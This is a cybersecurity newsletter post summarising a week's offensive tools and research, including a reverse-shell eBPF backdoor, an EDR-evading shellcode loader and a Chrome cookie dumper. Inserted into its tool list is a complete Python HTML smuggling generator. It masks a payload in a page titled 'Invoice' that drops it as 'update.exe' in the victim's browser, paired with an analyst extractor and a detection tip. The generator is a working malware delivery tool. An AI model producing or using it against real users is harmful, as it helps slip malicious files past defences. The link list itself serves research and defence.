Last Week in Security (LWiS) - 2022-04-04

Shared section abuse (@BillDemirkapi), ISOs and office MOTW (@DidierStevens), better fuzzing harnesses (@h0mbre_), PoshC2 Linux ELF loader (@jdsnape), "Event pipes" for IPC (@x86matthew), Linux LPE (@pqlqpql), .soap webshells (@0xbad53c), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2022-03-28 to 2022-04-04.

News

Techniques and Write-ups

Tools and Exploits

  • Introducing PoshC2 v8.0. BOF compatibility and a very slick Linux loader make version 8 worth checking out.
  • CVE-2022-1015 Local privilege escalation PoC for a bug in the nf_tables component of the Linux kernel. More details here.
  • Smug_Fu3k is an HTML smuggling generator.
  • Introducing PacketStreamer: distributed packet capture for cloud-native platforms. tcpdump is perhaps my favorite debugging tool, but with the #distributed #microservices world we live in now, it can be hard to actually get packets from where you need them. PacketStreamer aims to be a universal packet forwarder to enable network visibility and debugging.
  • DDexec is a technique to run binaries filelessly and stealthily on Linux by tricking dd into pwning itself (reflective injection).
  • boopkit is a Linux eBPF backdoor over TCP. Spawn reverse shells, RCE, on prior privileged access. Less Honkin, More Tonkin.
  • nim-loader is a WIP shellcode loader in nim with EDR evasion techniques.
  • Dump-Chrome-Cookies is a modified version of CookieBro and scripts to leverage it to dump Chrome cookies. Check out the blog post for more info.
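For readers who have not seen the trick behind generators like Smug_Fu3k: HTML smuggling never sends a file over the wire. The payload travels inside the page as text (base64, often lightly masked) and is reassembled client-side into a Blob that the browser then "downloads" locally, which is why a proxy inspecting downloads sees only an HTML document. The example below is added here and is not Smug_Fu3k's code; it builds such a page with a single-byte XOR mask (the key, the `data`/`key`/`name` variable names and the template are assumptions) and includes the matching extractor an analyst would use to pull the payload back out of a captured page.

```python
"""HTML smuggling: embed a file as masked base64 and rebuild it with a Blob.

Added example, not the Smug_Fu3k project's code. The template, variable
names and XOR mask are illustrative choices.
"""
import base64
import html
import json
import re

# Client-side half: decode, unmask, build a Blob and trigger a local "download".
# Double braces are literal braces for str.format().
HTML_TEMPLATE = """<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>{title}</title></head>
<body>
<script>
var data = "{b64}";
var key = {key};
var name = {name_js};
var bin = atob(data);
var bytes = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) {{ bytes[i] = bin.charCodeAt(i) ^ key; }}
var blob = new Blob([bytes], {{type: "application/octet-stream"}});
if (window.navigator.msSaveOrOpenBlob) {{
  window.navigator.msSaveOrOpenBlob(blob, name);
}} else {{
  var a = document.createElement("a");
  a.href = window.URL.createObjectURL(blob);
  a.download = name;
  document.body.appendChild(a);
  a.click();
  window.URL.revokeObjectURL(a.href);
}}
</script>
</body></html>
"""


def xor_mask(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applied twice it is the identity."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must fit in one byte")
    return bytes(b ^ key for b in data)


def build_smuggling_page(payload: bytes, filename: str, key: int = 0x5A,
                         title: str = "Invoice") -> str:
    """Return a self-contained HTML page that drops `payload` as `filename`."""
    b64 = base64.b64encode(xor_mask(payload, key)).decode("ascii")
    return HTML_TEMPLATE.format(
        title=html.escape(title),
        b64=b64,
        key=key,
        name_js=json.dumps(filename),  # safe JS string literal
    )


def extract_smuggled_payload(page: str):
    """Analyst side: recover (filename, payload bytes) from a page built above.

    Returns None if the page does not match the expected layout.
    """
    m_data = re.search(r'var data = "([A-Za-z0-9+/=]*)";', page)
    m_key = re.search(r'var key = (\d+);', page)
    m_name = re.search(r'var name = ("(?:[^"\\]|\\.)*");', page)
    if not (m_data and m_key and m_name):
        return None
    masked = base64.b64decode(m_data.group(1))
    key = int(m_key.group(1))
    if key > 0xFF:
        return None
    return json.loads(m_name.group(1)), xor_mask(masked, key)


if __name__ == "__main__":
    # Constructed sample payload: a fake PE header plus padding.
    sample = b"MZ\x90\x00" + b"A" * 16
    page = build_smuggling_page(sample, "update.exe")
    print(page)
    print(extract_smuggled_payload(page))
```

Note that the masking only defeats naive signature matching on the base64 text; a sandbox or browser instrumentation that sees the `Blob` being created and `a.download` being clicked still catches it, which is the behavior a detection engineer should key on rather than the encoded string.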

New to Me

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • Melody is a language that compiles to regular expressions and aims to be more easily readable and maintainable.
  • Rip Raw is a small tool to analyze the memory of compromised Linux systems.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.